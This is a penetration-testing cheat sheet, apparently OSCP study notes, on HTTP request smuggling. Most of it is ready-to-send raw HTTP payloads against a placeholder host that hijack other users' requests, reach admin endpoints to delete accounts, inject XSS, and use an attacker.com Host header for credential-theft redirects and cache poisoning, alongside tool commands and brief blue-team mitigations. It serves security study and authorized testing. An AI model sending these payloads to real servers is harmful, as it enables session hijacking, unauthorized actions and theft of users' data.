7.9.HTTP-Request-Smuggling.md

HTTP Request Smuggling

Table of Contents

• Overview
• Detection
• CL.TE Smuggling
• TE.CL Smuggling
• TE.TE Smuggling
• Exploitation Techniques
• Tools

---

Overview

What is HTTP Request Smuggling?

HTTP Request Smuggling exploits discrepancies in how front-end and back-end servers interpret HTTP requests, specifically the Content-Length and Transfer-Encoding headers.

Attack Types:

Type	Front-End Uses	Back-End Uses	Result
CL.TE	Content-Length	Transfer-Encoding	Front-end sees one request, back-end sees two
TE.CL	Transfer-Encoding	Content-Length	Front-end sees chunked, back-end sees content-length
TE.TE	Transfer-Encoding	Transfer-Encoding	Obfuscated TE header causes parsing difference

Prerequisites

• Target has front-end proxy/load balancer
• Back-end server processes HTTP differently than front-end
• Both servers support keep-alive connections

---

Detection

Quick Check (One-liner)

# Quick HTTP smuggling detection
smuggler -u https://$rhost -q && timeout 5 curl -X POST https://$rhost -H "Transfer-Encoding: chunked" -d "0\r\n\r\n"

Timing-Based Detection

CL.TE detection - if vulnerable, request will timeout

POST / HTTP/1.1
Host: $rhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Transfer-Encoding: chunked

1
A
X

TE.CL detection - if vulnerable, request will timeout

POST / HTTP/1.1
Host: $rhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
Transfer-Encoding: chunked

0

X

Differential Response Detection

Send normal request, then smuggling request Compare responses - if different, likely vulnerable

---

CL.TE Smuggling

Concept

• Front-end: Uses Content-Length
• Back-end: Uses Transfer-Encoding: chunked

Basic CL.TE Attack

Smuggle a second request that poisons next user's request

POST / HTTP/1.1
Host: $rhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Transfer-Encoding: chunked

0

SMUGGLED

CL.TE with Request Hijacking

Capture next user's request by smuggling incomplete request

POST / HTTP/1.1
Host: $rhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
Host: $rhost
Foo: x

CL.TE to Access Admin

Smuggle request to admin endpoint

POST / HTTP/1.1
Host: $rhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 116
Transfer-Encoding: chunked

0

GET /admin/delete?username=carlos HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 10

x=1

---

TE.CL Smuggling

Concept

• Front-end: Uses Transfer-Encoding: chunked
• Back-end: Uses Content-Length

Basic TE.CL Attack

Back-end processes based on Content-Length, ignoring chunked encoding

POST / HTTP/1.1
Host: $rhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Transfer-Encoding: chunked

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

TE.CL Request Hijacking

Poison next request with malicious prefix

POST / HTTP/1.1
Host: $rhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Transfer-Encoding: chunked

87
GET /admin HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

---

TE.TE Smuggling

Concept

Both servers use Transfer-Encoding, but one can be tricked with obfuscated header.

Header Obfuscation Techniques

Different ways to obfuscate Transfer-Encoding

Transfer-Encoding: xchunked
Transfer-Encoding : chunked
Transfer-Encoding: chunked
Transfer-Encoding: x
Transfer-Encoding:[tab]chunked
[space]Transfer-Encoding: chunked
X: X[\n]Transfer-Encoding: chunked
Transfer-Encoding
 : chunked

TE.TE Attack Example

One server processes obfuscated TE, other ignores it

POST / HTTP/1.1
Host: $rhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Transfer-Encoding: chunked
Transfer-encoding: x

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

---

Exploitation Techniques

Bypass Front-End Security Controls

Access restricted endpoints by smuggling internal host header

POST / HTTP/1.1
Host: $rhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 116
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
Host: localhost
X-Original-URL: /admin
Content-Length: 10

x=1

Capture Other Users' Requests

Smuggle request that stores victim's request in parameter

POST / HTTP/1.1
Host: $rhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 200
Transfer-Encoding: chunked

0

POST /post/comment HTTP/1.1
Host: $rhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 400
Cookie: session=attacker_session

comment=

Result: Next user's full request gets captured in comment field

Reflected XSS via Smuggling

Smuggle XSS payload that reflects in victim's response

POST / HTTP/1.1
Host: $rhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 150
Transfer-Encoding: chunked

0

GET /search?q=<script>alert(1)</script> HTTP/1.1
Host: $rhost
X-Ignore: x

Open Redirect to Credential Theft

Redirect victim to attacker-controlled server

POST / HTTP/1.1
Host: $rhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 150
Transfer-Encoding: chunked

0

GET /login HTTP/1.1
Host: attacker.com
X-Ignore: x

Web Cache Poisoning via Smuggling

Poison cache with malicious response

POST / HTTP/1.1
Host: $rhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 200
Transfer-Encoding: chunked

0

GET /static/app.js HTTP/1.1
Host: $rhost
X-Forwarded-Host: attacker.com
X-Ignore: x

---

Tools

Burp Suite Extensions

Use Burp's HTTP Request Smuggler extension

1. Install "HTTP Request Smuggler" from BApp Store
2. Right-click request → Extensions → HTTP Request Smuggler → Smuggle probe
3. Review results in Logger

smuggler.py

Automated detection tool

git clone https://github.com/defparam/smuggler.git
cd smuggler

# Scan single URL
python3 smuggler.py -u https://$rhost/

# Scan with custom config
python3 smuggler.py -u https://$rhost/ -c payloads/default.py

h2csmuggler (HTTP/2 Downgrade)

Smuggle via HTTP/2 to HTTP/1.1 downgrade

git clone https://github.com/BishopFox/h2csmuggler.git
cd h2csmuggler

# Test for vulnerability
python3 h2csmuggler.py -x https://$rhost/ --test

# Smuggle request
python3 h2csmuggler.py -x https://$rhost/ -X GET /admin

Manual Testing with curl

Send raw smuggling payload

# Note: curl may normalize headers, use netcat for precision
cat payload.txt | nc $rhost 80

Using printf for exact byte control

printf 'POST / HTTP/1.1\r\nHost: target.com\r\nContent-Length: 4\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nSMUGGLED' | nc $rhost 80

---

Mitigation & Detection

Prevention (Blue Team)

• Use HTTP/2 end-to-end (not downgraded)
• Normalize incoming requests at front-end
• Reject ambiguous requests (both CL and TE headers)
• Configure back-end to reject requests with Transfer-Encoding

Detection

• Monitor for requests containing both Content-Length and Transfer-Encoding
• Alert on chunked encoding with small Content-Length values
• Look for unusual timing patterns in request processing

---

See Also

• SSRF - Combine with smuggling for internal access
• Web Application Analysis - Discovery and enumeration
• Command Injection - Chain with smuggled requests
• OSCP Exam Tips - Web attack methodology

---

References

• PortSwigger - HTTP Request Smuggling
• HTTP Desync Attacks - albinowax
• HTTP/2 Request Smuggling - James Kettle